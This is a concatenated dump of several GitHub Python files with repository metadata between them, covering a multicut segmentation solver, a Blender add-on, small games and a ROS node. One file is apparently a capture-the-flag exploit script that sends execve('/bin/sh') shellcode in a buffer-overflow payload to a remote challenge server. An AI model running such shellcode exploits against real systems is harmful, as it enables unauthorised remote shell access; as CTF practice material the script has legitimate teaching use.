# otherwise we run normal multicut
else:
fu.log("Block %i: don't have lifted edges and use multicut solver")
# solve multicut and relabel the result
sub_result = solver(sub_graph, sub_costs, time_limit=time_limit)
assert len(sub_result) == len(nodes), "%i, %i" % (len(sub_result), len(nodes))
sub_edgeresult = sub_result[sub_uvs[:, 0]] != sub_result[sub_uvs[:, 1]]
assert len(sub_edgeresult) == len(inner_edges)
cut_edge_ids = inner_edges[sub_edgeresult]
cut_edge_ids = np.concatenate([cut_edge_ids, outer_edges])
_, res_max_id, _ = vigra.analysis.relabelConsecutive(sub_result, start_label=1,
keep_zeros=False,
out=sub_result)
fu.log("Block %i: Subresult has %i unique ids" % (block_id, res_max_id))
# IMPORTANT !!!
# we can only add back the ignore label after getting the edge-result !!!
if removed_ignore_label:
sub_result = np.concatenate((np.zeros(1, dtype='uint64'),
sub_result))
# get chunk id of this block
block = blocking.getBlock(block_id)
chunk_id = tuple(beg // sh for beg, sh in zip(block.begin, blocking.blockShape))
# serialize the cut-edge-ids and the (local) node labeling
ds_edge_res = out['cut_edge_ids']
fu.log("Block %i: Serializing %i cut edges" % (block_id, len(cut_edge_ids)))
ds_edge_res.write_chunk(chunk_id, cut_edge_ids, True)
if sub_result is not None:
ds_node_res = out['node_result']
fu.log("Block %i: Serializing %i node results" % (block_id, len(sub_result)))
ds_node_res.write_chunk(chunk_id, sub_result, True)
fu.log_block_success(block_id)
def solve_lifted_subproblems(job_id, config_path):
fu.log("start processing job %i" % job_id)
fu.log("reading config from %s" % config_path)
# get the config
with open(config_path) as f:
config = json.load(f)
# input configs
problem_path = config['problem_path']
scale = config['scale']
block_shape = config['block_shape']
block_list = config['block_list']
lifted_prefix = config['lifted_prefix']
agglomerator_key = config['agglomerator']
time_limit = config.get('time_limit_solver', None)
n_threads = config.get('threads_per_job', 1)
fu.log("reading problem from %s" % problem_path)
problem = z5py.N5File(problem_path)
# load the costs
# NOTE we use different cost identifiers for multicut and lifted multicut
# in order to run both in the same n5-container.
# However, for scale level 0 the costs come from the CostsWorkflow and
# hence the identifier is identical
costs_key = 's%i/costs_lmc' % scale if scale > 0 else 's0/costs'
fu.log("reading costs from path in problem: %s" % costs_key)
ds = problem[costs_key]
ds.n_threads = n_threads
costs = ds[:]
# load the graph
# NOTE we use different graph identifiers for multicut and lifted multicut
# in order to run both in the same n5-container.
# However, for scale level 0 the graph comes from the GraphWorkflow and
# hence the identifier is identical
graph_key = 's%i/graph_lmc' % scale if scale > 0 else 's0/graph'
shape = problem[graph_key].attrs['shape']
fu.log("reading graph from path in problem: %s" % graph_key)
graph = ndist.Graph(problem_path, graph_key, numberOfThreads=n_threads)
uv_ids = graph.uvIds()
# check if the problem has an ignore-label
ignore_label = problem[graph_key].attrs['ignore_label']
fu.log("ignore label is %s" % ('true' if ignore_label else 'false'))
fu.log("using agglomerator %s" % agglomerator_key)
lifted_solver = get_lifted_multicut_solver(agglomerator_key)
# TODO enable different multicut agglomerator
solver = get_multicut_solver(agglomerator_key)
# load the lifted edges and costs
nh_key = 's%i/lifted_nh_%s' % (scale, lifted_prefix)
lifted_costs_key = 's%i/lifted_costs_%s' % (scale, lifted_prefix)
ds = problem[nh_key]
fu.log("reading lifted uvs")
ds.n_threads = n_threads
lifted_uvs = ds[:]
fu.log("reading lifted costs")
ds = problem[lifted_costs_key]
ds.n_threads = n_threads
lifted_costs = ds[:]
# the output group
out = problem['s%i/sub_results_lmc' % scale]
# NOTE we use different sub-graph identifiers for multicut and lifted multicut
# in order to run both in the same n5-container.
# However, for scale level 0 the sub-graphs come from the GraphWorkflow and
# are hence identical
sub_graph_identifier = 'sub_graphs' if scale == 0 else 'sub_graphs_lmc'
ds_nodes = problem['s%i/%s/nodes' % (scale, sub_graph_identifier)]
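    # Layout sketch (assumed): scale 0 reuses s0/costs, s0/graph and s0/sub_graphs from the
    # generic workflows, while scale > 0 reads the *_lmc variants written for the lifted problem.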
blocking = nt.blocking([0, 0, 0], shape, list(block_shape))
fu.log("start processsing %i blocks" % len(block_list))
with futures.ThreadPoolExecutor(n_threads) as tp:
tasks = [tp.submit(_solve_block_problem,
block_id, graph, uv_ids, ds_nodes,
costs, lifted_uvs, lifted_costs,
lifted_solver, solver, ignore_label,
blocking, out, time_limit)
for block_id in block_list]
[t.result() for t in tasks]
fu.log_job_success(job_id)
if __name__ == '__main__':
path = sys.argv[1]
assert os.path.exists(path), path
job_id = int(os.path.split(path)[1].split('.')[0].split('_')[-1])
solve_lifted_subproblems(job_id, path)
|
constantinpape/cluster_tools
|
cluster_tools/lifted_multicut/solve_lifted_subproblems.py
|
solve_lifted_subproblems.py
|
py
| 13,622 |
python
|
en
|
code
| 32 |
github-code
|
6
|
70063403388
|
from multiprocessing import context
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
# p=process('./pwn')
p=remote('t.ctf.qwq.cc',49468)
pause()
elf=ELF('./pwn')
context.arch ='amd64'
context.bits=64
shellcode=asm('push 0x68;mov rax ,0x68732f6e69622f;push rax;mov rdi,rsp;xor rsi, rsi;xor rdx, rdx;xor rax,rax;add rax,0x3b;syscall')
p.recvuntil(b'Do u know what\'s is it?\n')
payload=shellcode.ljust(0x38,b'a')+b'\x2a'
# payload=b'a'*0x30#+p64(0x7ffdadf3ddf0)
p.send(payload)
p.interactive()
|
CookedMelon/mypwn
|
NPU/shellcode/exp.py
|
exp.py
|
py
| 520 |
python
|
en
|
code
| 3 |
github-code
|
6
|
69893012668
|
import episodes
import praw
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
comments_dict = {
'comment_id': [],
'comment' : [],
'Upvotes_Comment' : [],
'author' : []
}
reddit = episodes.reddit
submission = reddit.submission(id=episodes.episodes[-2])
submission.comments.replace_more(limit=None)
for h in submission.comments:
comments_dict['comment_id'].append(h.id)
comments_dict['comment'].append(h.body)
comments_dict['Upvotes_Comment'].append(h.ups)
comments_dict['author'].append(h.author)
queen_comments = pd.DataFrame(comments_dict)
queens = {'aiden': [], 'sherry': [], 'brita': [], 'heidi': [], 'gigi': [], 'jackie': [], 'widow': [], 'nicky': [], 'crystal': [], 'jaida': [], 'rock m': [], 'dahlia': [], 'jan': []}
queens_copy = queens.copy()
for queen in queens:
for comment in queen_comments.comment:
if queen in comment.lower():
queens[queen].append(1)
else:
queens[queen].append(0)
queens_only = pd.DataFrame(queens)[['aiden', 'sherry', 'brita', 'heidi', 'gigi', 'jackie', 'widow', 'nicky',
'crystal', 'jaida', 'rock m', 'dahlia', 'jan']]
# Plot of the most talked about queens
queens_only.sum().sort_values(ascending=False).plot(kind='bar')
# Let's see which queens appeared together
for queen in queens_copy:
for comment in queen_comments.comment:
if queen in comment.lower():
queens_copy[queen].append(queen)
else:
queens_copy[queen].append(0)
queens_copy = pd.DataFrame(queens_copy)
grouped = []
def groupy(a):
return list(filter(lambda a: a != 0, a))
for i in queens_copy.iterrows():
grouped.append(groupy(i[1].to_list()))
queens_copy['grouped'] = [None if len(x)==0 else x for x in grouped]
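# Sketch: a comment mentioning both "gigi" and "jaida" contributes the row
# ["gigi", "jaida"] to `grouped`, so the final plot counts how often each
# combination of queens is mentioned together.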
# we can see which queens are being talked about together
queens_copy['grouped'].apply(lambda x: x if (x is not None and len(x) > 1) else None).value_counts().head(6).plot(kind='bar')
|
mabolhal/rpdrSeason12
|
rpdr_main.py
|
rpdr_main.py
|
py
| 2,025 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21480391270
|
from collections import namedtuple, defaultdict
import numpy as np
import bmesh
import bpy
from ..math import get_dist_sq
from ..log import log, logd
from ..helpers import get_context, get_modifier_mask
# shape_key_apply_modifiers TODO:
# - Specialcase more merging modifiers, solidify for example
# - Transfer vertex order. Is it still necessary if all merging modifiers are covered?
# Is it possible to identify which face went where without guessing?
class ShapeKeyInfo(namedtuple('ShapeKeyInfo', ['coords', 'interpolation', 'mute', 'name',
'slider_max', 'slider_min', 'value', 'vertex_group'])):
    """Helper to preserve shape key information."""
    __slots__ = ()
@classmethod
def from_shape_key_with_empty_data(cls, shape_key):
return cls(
coords=np.empty(0, dtype=np.single),
interpolation=shape_key.interpolation,
mute=shape_key.mute,
name=shape_key.name,
# relative_key=shape_key.relative_key.name,
slider_max=shape_key.slider_max,
slider_min=shape_key.slider_min,
value=shape_key.value,
vertex_group=shape_key.vertex_group,
)
@classmethod
def from_shape_key(cls, shape_key):
info = cls.from_shape_key_with_empty_data(shape_key)
info.get_coords_from(shape_key.data)
return info
def get_coords_from(self, vertices):
self.coords.resize(len(vertices) * 3, refcheck=False)
vertices.foreach_get('co', self.coords)
def put_coords_into(self, vertices):
vertices.foreach_set('co', self.coords)
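    # Usage sketch: from_shape_key(key) captures a key's coordinates before modifiers are
    # applied; put_coords_into(new_key.data) writes them back into a freshly added key.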
def weld_mesh(mesh, weld_map):
"""Welds mesh vertices according to a source index to destination index weld map."""
bm = bmesh.new()
bm.from_mesh(mesh)
bm.verts.ensure_lookup_table()
targetmap = {bm.verts[src_idx]: bm.verts[dst_idx] for src_idx, dst_idx in weld_map.items()}
bmesh.ops.weld_verts(bm, targetmap=targetmap)
bm.to_mesh(mesh)
bm.free()
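# weld_mesh sketch: weld_map maps source vertex index -> destination vertex index,
# e.g. {12: 4, 13: 4} collapses vertices 12 and 13 onto vertex 4.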
def apply_modifier(modifier):
try:
bpy.ops.object.modifier_apply(get_context(modifier.id_data), modifier=modifier.name)
except RuntimeError:
logd(f"Couldn't apply {modifier.type} modifier {modifier.name}")
class ModifierHandler:
"""Subclass this to define special behavior when applying different modifiers."""
modifier_type = None
modifier_name = None
def __init__(self, modifier):
self.modifier_name = modifier.name
@classmethod
def poll(cls, modifier):
return cls.modifier_type is None or modifier.type == cls.modifier_type
def apply(self, obj):
apply_modifier(obj.modifiers[self.modifier_name])
class MirrorModifierHandler(ModifierHandler):
modifier_type = 'MIRROR'
weld_map = None # Specifies vertex pairs to be welded
def __init__(self, modifier):
super().__init__(modifier)
self.merge_dist = modifier.merge_threshold
self.num_mirrors = sum(modifier.use_axis)
@classmethod
def poll(cls, modifier):
return super().poll(modifier) and modifier.use_mirror_merge and any(modifier.use_axis)
def apply(self, obj):
modifier = obj.modifiers[self.modifier_name]
modifier.use_mirror_merge = False
bpy.ops.object.modifier_apply(get_context(obj), modifier=modifier.name)
if not self.weld_map:
self.fill_weld_map(obj)
weld_mesh(obj.data, self.weld_map)
def fill_weld_map(self, obj):
mesh = obj.data
num_verts = len(mesh.vertices) // (2 ** self.num_mirrors) # Num of verts before mirroring
merge_dist_sq = self.merge_dist ** 2
# Only consider pairs of mirrored vertices for merging. Probably breaks if flip is enabled
welds = []
for n in range(self.num_mirrors):
num_part_verts = num_verts * (2 ** n)
new_welds = []
for src_idx, dst_idx in welds:
new_welds.append((src_idx + num_part_verts, dst_idx + num_part_verts))
welds.extend(new_welds)
for vert_idx in range(num_part_verts):
vert = mesh.vertices[vert_idx]
other_vert_idx = vert_idx + num_part_verts
other_vert = mesh.vertices[other_vert_idx]
if get_dist_sq(vert.co, other_vert.co) <= merge_dist_sq:
welds.append((other_vert_idx, vert_idx))
# Resolve the welds into a single dict. Not too robust but weld_verts doesn't complain
self.weld_map = weld_map = {}
weld_map_reverse = defaultdict(list)
for src_idx, dst_idx in welds:
dst_idx = weld_map.get(dst_idx, dst_idx)
weld_map[src_idx] = dst_idx
old_idxs = weld_map_reverse.get(src_idx, [])
for old_idx in old_idxs:
weld_map[old_idx] = dst_idx
weld_map_reverse[dst_idx].append(old_idx)
weld_map_reverse[dst_idx].append(src_idx)
class WeldModifierHandler(ModifierHandler):
modifier_type = 'WELD'
weld_map = None # Specifies vertex pairs to be welded
def __init__(self, modifier):
super().__init__(modifier)
self.merge_dist = modifier.merge_threshold
self.vertex_group = modifier.vertex_group
self.invert_vertex_group = modifier.invert_vertex_group
@classmethod
def poll(cls, modifier):
return super().poll(modifier) and modifier.mode == 'ALL'
def apply(self, obj):
modifier = obj.modifiers[self.modifier_name]
bpy.ops.object.modifier_remove(get_context(obj), modifier=modifier.name)
if not self.weld_map:
self.fill_weld_map(obj)
weld_mesh(obj.data, self.weld_map)
def fill_weld_map(self, obj):
mesh = obj.data
vg = obj.vertex_groups.get(self.vertex_group)
invert = self.invert_vertex_group
bm = bmesh.new()
bm.from_mesh(mesh)
bm.verts.ensure_lookup_table()
deform_layer = bm.verts.layers.deform.active
if deform_layer and vg:
# Handle vertex group filtering
verts = [v for v in bm.verts if bool(v[deform_layer].get(vg.index, 0.0)) != invert]
else:
verts = bm.verts
targetmap = bmesh.ops.find_doubles(bm, verts=verts, dist=self.merge_dist)['targetmap']
self.weld_map = {src.index: dst.index for src, dst in targetmap.items()}
bm.free()
modifier_handler_classes = (
MirrorModifierHandler,
WeldModifierHandler,
ModifierHandler,
)
# Incomplete map of modifier type to icon
modifier_icons = {
'DATA_TRANSFER': 'MOD_DATA_TRANSFER',
'MESH_CACHE': 'MOD_MESHDEFORM',
'MESH_SEQUENCE_CACHE': 'MOD_MESHDEFORM',
'NORMAL_EDIT': 'MOD_NORMALEDIT',
'WEIGHTED_NORMAL': 'MOD_NORMALEDIT',
'UV_PROJECT': 'MOD_UVPROJECT',
'UV_WARP': 'MOD_UVPROJECT',
'VERTEX_WEIGHT_EDIT': 'MOD_VERTEX_WEIGHT',
'VERTEX_WEIGHT_MIX': 'MOD_VERTEX_WEIGHT',
'VERTEX_WEIGHT_PROXIMITY': 'MOD_VERTEX_WEIGHT',
'ARRAY': 'MOD_ARRAY',
'BEVEL': 'MOD_BEVEL',
'BOOLEAN': 'MOD_BOOLEAN',
'BUILD': 'MOD_BUILD',
'DECIMATE': 'MOD_DECIM',
'EDGE_SPLIT': 'MOD_EDGESPLIT',
'NODES': 'NODETREE',
'MASK': 'MOD_MASK',
'MIRROR': 'MOD_MIRROR',
'MULTIRES': 'MOD_MULTIRES',
'REMESH': 'MOD_REMESH',
'SCREW': 'MOD_SCREW',
'SKIN': 'MOD_SKIN',
'SOLIDIFY': 'MOD_SOLIDIFY',
'SUBSURF': 'MOD_SUBSURF',
'TRIANGULATE': 'MOD_TRIANGULATE',
'VOLUME_TO_MESH': 'VOLUME_DATA',
'WELD': 'AUTOMERGE_OFF',
'WIREFRAME': 'MOD_WIREFRAME',
'ARMATURE': 'MOD_ARMATURE',
'CAST': 'MOD_CAST',
'CURVE': 'MOD_CURVE',
'DISPLACE': 'MOD_DISPLACE',
'HOOK': 'HOOK',
'LAPLACIANDEFORM': 'MOD_MESHDEFORM',
'LATTICE': 'MOD_LATTICE',
'MESH_DEFORM': 'MOD_MESHDEFORM',
'SHRINKWRAP': 'MOD_SHRINKWRAP',
'SIMPLE_DEFORM': 'MOD_SIMPLEDEFORM',
'SMOOTH': 'MOD_SMOOTH',
'CORRECTIVE_SMOOTH': 'MOD_SMOOTH',
'LAPLACIANSMOOTH': 'MOD_SMOOTH',
'SURFACE_DEFORM': 'MOD_MESHDEFORM',
'WARP': 'MOD_WARP',
'WAVE': 'MOD_WAVE',
}
ignored_modifier_types = frozenset((
'CLOTH',
'COLLISION',
'DYNAMIC_PAINT',
'EXPLODE',
'FLUID',
'OCEAN',
'PARTICLE_INSTANCE',
'PARTICLE_SYSTEM',
'SOFT_BODY',
))
class GRET_OT_shape_key_apply_modifiers(bpy.types.Operator):
"""Applies viewport modifiers while preserving shape keys"""
bl_idname = "gret.shape_key_apply_modifiers"
bl_label = "Apply Modifiers with Shape Keys"
bl_context = "objectmode"
bl_options = {'REGISTER', 'UNDO'}
modifier_mask: bpy.props.BoolVectorProperty(
name="Apply Modifier",
description="Whether this modifier should be applied",
size=32, # Maximum allowed by Blender, will need some hack if more are required
default=[True] * 32,
)
modifier_info = [] # Only used to draw buttons when operator is invoked
@classmethod
def poll(cls, context):
return context.mode == 'OBJECT' and context.object and context.object.type == 'MESH'
def draw(self, context):
layout = self.layout
layout.ui_units_x = 10.0
obj = context.object
layout.label(text="Select modifiers to apply:")
col = layout.column(align=True)
for modifier_index, (modifier_type, modifier_name) in enumerate(self.modifier_info):
if modifier_type in ignored_modifier_types:
continue
icon = modifier_icons.get(modifier_type, 'BLANK1')
col.prop(self, 'modifier_mask', index=modifier_index, icon=icon, text=modifier_name)
def invoke(self, context, event):
obj = context.object
# Cache modifier info to be shown on panel. Otherwise redo_last won't work correctly
# Side note: the displayed icon for show_viewport is hardcoded to change when toggled on
def should_apply_modifier(mod):
return (mod.show_viewport
and mod.type not in ignored_modifier_types
and mod.type != 'ARMATURE') # Don't apply armatures by default
self.modifier_info = [(mod.type, mod.name) for mod in obj.modifiers]
self.modifier_mask = get_modifier_mask(obj, should_apply_modifier)
return context.window_manager.invoke_props_dialog(self)
def execute(self, context):
obj = context.active_object
if not any(self.modifier_mask[:len(obj.modifiers)]):
# There are no modifiers to apply
return {'FINISHED'}
if obj.data.users > 1:
# Make single user copy
obj.data = obj.data.copy()
num_shape_keys = len(obj.data.shape_keys.key_blocks) if obj.data.shape_keys else 0
if not num_shape_keys:
# No shape keys, just apply the modifiers
for modifier, mask in zip(obj.modifiers[:], self.modifier_mask):
if mask:
apply_modifier(modifier)
return {'FINISHED'}
print(f"Applying modifiers with {num_shape_keys} shape keys")
mesh_copy = obj.data.copy() # Copy for convenience, to be able to call from_existing(fcurve)
shape_keys = obj.data.shape_keys.key_blocks if obj.data.shape_keys else []
shape_key_infos = []
saved_active_shape_key_index = obj.active_shape_key_index
saved_show_only_shape_key = obj.show_only_shape_key
# Start by separating each shape key so modifiers can be applied one by one
shape_key_objs = []
for shape_key in shape_keys:
shape_key_info = ShapeKeyInfo.from_shape_key(shape_key)
shape_key_infos.append(shape_key_info)
new_obj = obj.copy()
new_obj.name = f"{obj.name}_{shape_key.name}"
new_obj.data = obj.data.copy()
shape_key_objs.append(new_obj)
# Handle modifiers accordingly. This means recording welded vertex pairs for mirrors and such
obj.shape_key_clear()
modifier_handlers = []
for modifier, mask in zip(obj.modifiers[:], self.modifier_mask):
if mask:
for modifier_handler_cls in modifier_handler_classes:
if modifier_handler_cls.poll(modifier):
modifier_handler = modifier_handler_cls(modifier)
modifier_handler.apply(obj)
modifier_handlers.append(modifier_handler)
break
# Store vertex coordinates of each shape key with modifiers applied
for sk_info, sk_obj in zip(shape_key_infos, shape_key_objs):
sk_mesh = sk_obj.data
sk_obj.shape_key_clear()
sk_info.put_coords_into(sk_mesh.vertices)
for modifier_handler in modifier_handlers:
modifier_handler.apply(sk_obj)
sk_info.get_coords_from(sk_mesh.vertices)
bpy.data.objects.remove(sk_obj)
bpy.data.meshes.remove(sk_mesh)
# Add the shape keys back
for shape_key_info in shape_key_infos:
shape_key = obj.shape_key_add()
shape_key.interpolation = shape_key_info.interpolation
shape_key.mute = shape_key_info.mute
shape_key.name = shape_key_info.name
shape_key.slider_max = shape_key_info.slider_max
shape_key.slider_min = shape_key_info.slider_min
shape_key.value = shape_key_info.value
shape_key.vertex_group = shape_key_info.vertex_group
if len(shape_key.data) * 3 != len(shape_key_info.coords):
self.report({'ERROR'}, f"Vertex count for {shape_key.name} did not match, "
"the shape key will be lost.")
continue
shape_key_info.put_coords_into(shape_key.data)
# Recreate drivers
if mesh_copy.shape_keys and mesh_copy.shape_keys.animation_data:
for fcurve in mesh_copy.shape_keys.animation_data.drivers:
if obj.data.shape_keys.animation_data is None:
obj.data.shape_keys.animation_data_create()
obj.data.shape_keys.animation_data.drivers.from_existing(src_driver=fcurve)
# Clean up
obj.show_only_shape_key = saved_show_only_shape_key
obj.active_shape_key_index = saved_active_shape_key_index
bpy.data.meshes.remove(mesh_copy)
return {'FINISHED'}
def draw_menu(self, context):
self.layout.operator(GRET_OT_shape_key_apply_modifiers.bl_idname, icon='CHECKMARK')
def register(settings, prefs):
bpy.utils.register_class(GRET_OT_shape_key_apply_modifiers)
bpy.types.MESH_MT_shape_key_context_menu.append(draw_menu)
def unregister():
bpy.types.MESH_MT_shape_key_context_menu.remove(draw_menu)
bpy.utils.unregister_class(GRET_OT_shape_key_apply_modifiers)
|
greisane/gret
|
mesh/shape_key_apply_modifiers.py
|
shape_key_apply_modifiers.py
|
py
| 15,203 |
python
|
en
|
code
| 298 |
github-code
|
6
|
33550488518
|
from tkinter import *
from tkinter.messagebox import showinfo, showerror
import random
cards = {"shown": random.randint(1, 13), "secret": random.randint(1, 13)}
window = Tk()
window.title("High-Low Card Game")
window.geometry("300x100")
Label(window, text="The shown card is, ").grid(row=0, column=0)
shown_card_label = Label(window, text=cards["shown"])
shown_card_label.grid(row=0, column=1)
Label(window, text="Is the next one going to be higher or lower?").grid(
row=1, column=0, columnspan=2
)
def clicked(chosen):
correct_high = chosen == "higher" and cards["secret"] > cards["shown"]
correct_low = chosen == "lower" and cards["secret"] < cards["shown"]
if correct_high or correct_low:
showinfo(message=f"you WON! the hidden card was {cards['secret']}")
else:
showerror(message=f"you LOST! the hidden card was {cards['secret']}")
cards["shown"] = cards["secret"]
cards["secret"] = random.randint(1, 13)
shown_card_label.configure(text=cards["shown"])
Button(
window, text="Lower", command=lambda: clicked("lower"), background="green3"
).grid(row=2, column=0)
Button(
window, text="Higher", command=lambda: clicked("higher"), background="red3"
).grid(row=2, column=1)
def on_closing():
if showinfo(message="Thank you for playing, goodbye :)"):
window.destroy()
window.protocol("WM_DELETE_WINDOW", on_closing)
window.mainloop()
|
gabrielecalvo/Language4Water
|
archive/2021-22_semester2/bespoke_samples/desktop_gui/tkinter/1_high_low.py
|
1_high_low.py
|
py
| 1,414 |
python
|
en
|
code
| 4 |
github-code
|
6
|
22751373229
|
'''
Created on Apr 29, 2014
@author: oliwa
'''
class DataHolderForDirectOutput(object):
'''
Holds the direct results data from the NMAUnified that is to be outputted.
'''
def __init__(self, protein1_A_name):
'''
Constructor
Args:
protein1_A_name: the name of the protein1_A_name
'''
self.protein1_A_name = protein1_A_name
# whole references to the direct data
RMSD_unbound_to_superposed_bound = None
RMSDReductionsWhole = None
overlapTApproxWhole = None
stepPointsReductionWhole = None
overlapArrayWhole = None
cumulOverlapWholePrody = None
collectivityArrayWhole = None
correlationArrayWhole = None
# interface references to the direct data
RMSD_interface = None
RMSDReductionsInterface = None
overlapTApproxInterface = None
stepPointsReductionInterface = None
overlapArrayInterface = None
cumulOverlapInterfacePrody = None
collectivityArrayInterface = None
correlationArrayInterface = None
# distance measures (I-rms, ligand-rms)
counterpart_rms = None
L_rms = None
I_rms_before_align = None
I_rms_after_align = None
# L_RMS reduction
L_RMSReductions = None
L_RMSD_unbound_to_superposed_bound = None
# pdbs
reference = None
mobile = None
unboundCounterpart = None
boundCountertpart = None
unboundComplex = None
boundComplex = None
refChain = None
refChainInterface = None
mobChain = None
mobChainInterface = None
unboundCounterpartChain = None
unboundCounterpartChainInterface = None
boundCounterpartChain = None
boundCounterpartChainInterface = None
unboundComplexAlignedChain = None
unboundComplexChainInterface = None
boundComplexChain = None
boundComplexChainInterface = None
#overlap of Marray superset
singleModeOverlapsFromSuperset = None
deformationSnapshots = None
#lambdaR for complex
indicesOfLambdaRSorting = None
|
Shen-Lab/cNMA
|
Software/DataHolderForDirectOutput.py
|
DataHolderForDirectOutput.py
|
py
| 2,230 |
python
|
en
|
code
| 4 |
github-code
|
6
|
35951119766
|
class hamming():
def dystans(self,a, b):
if type(a) != str or type(b) != str:
raise ValueError("a lub b nie jest str")
if len(a) != len(b):
raise ValueError("dlugosc a nie rowna dlugosci b")
wynik = 0
for i in range(len(b)):
if a[i] != b[i]:
wynik += 1
return wynik
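# Sketch: hamming().dystans("kot", "kos") == 1 -- only the last character differs.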
|
TestowanieAutomatyczneUG/laboratorium-13-matt1sor
|
zad2/src/hamming.py
|
hamming.py
|
py
| 361 |
python
|
pl
|
code
| 0 |
github-code
|
6
|
26053687100
|
from itertools import permutations
vowels = ["а"]
consonants = ["б", "т", "с"]
result = set()
for index, i in enumerate(permutations("аббатиса")):
correct = True
for symbol_index in range(0, len(i) - 1):
if (i[symbol_index] in vowels and i[symbol_index + 1] in vowels) or \
(i[symbol_index] in consonants and i[symbol_index + 1] in consonants):
correct = False
break
if correct:
result.add(i)
print(len(result))
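# Sketch: a permutation of "аббатиса" is kept only if no two letters from `vowels` are
# adjacent and no two letters from `consonants` are adjacent; letters listed in neither
# set (here "и") are unconstrained. The printed number is the count of distinct valid
# arrangements.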
|
Woolfer0097/UGE_IT
|
8 task/235.py
|
235.py
|
py
| 495 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41058579846
|
class Poly:
def __init__(self,*terms):
# __str__ uses the name self.terms for the dictionary of terms
# So __init__ should build this dictionary from terms
self.terms = {}
if terms:
for term in terms:
power = term[1]
coeff = term[0]
if type(coeff) in (int, float) and (type(power) == int and power >= 0):
if power in self.terms and coeff != 0:
raise AssertionError('Poly.__init__: same power cannot appear as later term')
elif coeff == 0:
pass
else:
self.terms[power] = coeff
else:
raise AssertionError
# Fill in the rest of this method, using *terms to intialize self.terms
# I have written str(...) because it is used in the bsc.txt file and
# it is a bit subtle to get correct. Notice that it assumes that
# every Poly object stores a dict whose keys are powers and whose
# associated values are coefficients. This function does not depend
# on any other method in this class being written correctly.
def __str__(self):
def term(c,p,var):
return (str(c) if p == 0 or c != 1 else '') +\
('' if p == 0 else var+('^'+str(p) if p != 1 else ''))
if len(self.terms) == 0:
return '0'
else:
return ' + '.join([term(c,p,'x') for p,c in sorted(self.terms.items(),reverse=True)]).replace('+ -','- ')
def __repr__(self):
pair = ''
for power, coeff in self.terms.items():
pair += '('+str(coeff)+','+str(power)+'),'
pair = pair.strip(',')
return 'Poly('+pair+')'
def __len__(self):
if self.terms:
return sorted(self.terms.items(), reverse=True)[0][0]
else:
return 0
def __call__(self,arg):
value = 0
for power, coeff in self.terms.items():
value += coeff*(arg**power)
return value
def __iter__(self):
for power, coeff in sorted(self.terms.items(), reverse=True):
yield coeff, power
def __getitem__(self,index):
if type(index) == int and index >=0:
if index not in self.terms:
return 0
else:
return self.terms[index]
else:
raise TypeError
def __setitem__(self,index,value):
if type(index) == int and index >= 0:
if value == 0:
if index in self.terms.keys():
del self.terms[index]
else:
self.terms[index] = value
else:
raise TypeError
def __delitem__(self,index):
if type(index) == int and index >= 0:
if index in self.terms:
del self.terms[index]
else:
raise TypeError
def _add_term(self,c,p):
if type(c) in (int, float) and type(p) == int and p >= 0:
if p not in self.terms and c != 0:
self.terms[p] = c
elif p in self.terms:
if self.terms[p] + c == 0:
del self.terms[p]
else:
self.terms[p] = self.terms[p] + c
else:
raise TypeError
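    # Sketch: _add_term(3, 2) on an empty Poly stores {2: 3}; a later _add_term(-3, 2)
    # cancels the coefficient and removes the power 2 entry entirely.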
def __add__(self,right):
new = Poly()
if type(right) == Poly:
for p, c in right.terms.items():
new._add_term(c, p)
for p, c in self.terms.items():
new._add_term(c, p)
elif type(right) in (int, float):
new._add_term(right, 0)
for p, c in self.terms.items():
new._add_term(c, p)
else:
raise TypeError
return new
def __radd__(self,left):
return self.__add__(left)
    def __mul__(self,right):
        new = Poly()
        if type(right) == Poly:
            # multiply every term of self by every term of right and accumulate the products
            for p1, c1 in self.terms.items():
                for p2, c2 in right.terms.items():
                    new._add_term(c1 * c2, p1 + p2)
        elif type(right) in (int, float):
            for p, c in self.terms.items():
                new._add_term(c * right, p)
        else:
            raise TypeError
        return new
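    # Sketch: Poly((1,1),(1,0)) * Poly((1,1),(-1,0)) yields x^2 - 1, i.e. terms {2: 1, 0: -1}.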
    def __rmul__(self,left):
        return self.__mul__(left)
def __eq__(self,right):
if type(right) == Poly:
return self.terms == right.terms
if __name__ == '__main__':
# Some simple tests; you can comment them out and/or add your own before
# the driver is called.
print('Start simple tests')
p = Poly((3,2),(-2,1), (4,0))
print(' For Polynomial: 3x^2 - 2x + 4')
print(' str(p):',p)
print(' repr(p):',repr(p))
print(' len(p):',len(p))
print(' p(2):',p(2))
print(' list collecting iterator results:',[t for t in p])
print(' p+p:',p+p)
print(' p+2:',p+2)
print(' p*p:',p*p)
print(' p*2:',p*2)
print('End simple tests\n')
import driver
#driver.default_show_exception=True
#driver.default_show_exception_message=True
#driver.default_show_traceback=True
driver.driver()
|
solomc1/python
|
ics 33/solutions/ile2 solutions/Lab 5/LiTina/poly.py
|
poly.py
|
py
| 5,891 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9485038359
|
#!/usr/bin/env python3
# import ROS for developing the node
import rospy
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
# for reading the force commands
force = 0.0
pos_cur = float()
key_released = True # by default we assume that they arrow key on keyboard is not pressed
# get the force value
def get_force(data):
global force
global key_released
force = data.linear.x # update the force value
key_released = False # now the key is pressed
# read the position value
def pose_callback(data):
global pos_cur
pos_cur = data.x
if __name__ == '__main__':
# initialize the node
rospy.init_node('turtle_inertia', anonymous = True)
# declare a publisher to publish in the velocity command topic
cmd_pub = rospy.Publisher('/turtle1/cmd_vel', Twist, queue_size = 10)
# define the force command subscriber
force_sub = rospy.Subscriber("/turtle1/cmd_force", Twist, get_force)
# add a subscriber to it to read the position information
pos_sub = rospy.Subscriber('/turtle1/pose', Pose, pose_callback)
# set a 10Hz frequency for this loop
freq = 10
loop_rate = rospy.Rate(freq)
# define the delta t
dt = 1/freq
# declare a variable of type Twist for sending control commands
vel_cmd = Twist()
    # define the parameters of the equations
mass = 1.0 # m in the equations (kg)
damping = 1.0 # b in the equations (Ns/m)
vel_next = 0.0 # initialize the next velocity
pos_prev = 0.0 # initialize the previous position
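    # Discretization sketch: the model m*dv/dt = F - b*v is advanced with one explicit
    # Euler step per cycle, v_next = v + (dt/m)*(F - b*v), where v is estimated from
    # consecutive pose readings as (pos_cur - pos_prev)/dt.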
# run this control loop regularly
while not rospy.is_shutdown():
print(key_released)
if key_released:
force = 0.0 # make sure to remove non-zero commands when key is released
vel_cur = (pos_cur - pos_prev)/dt
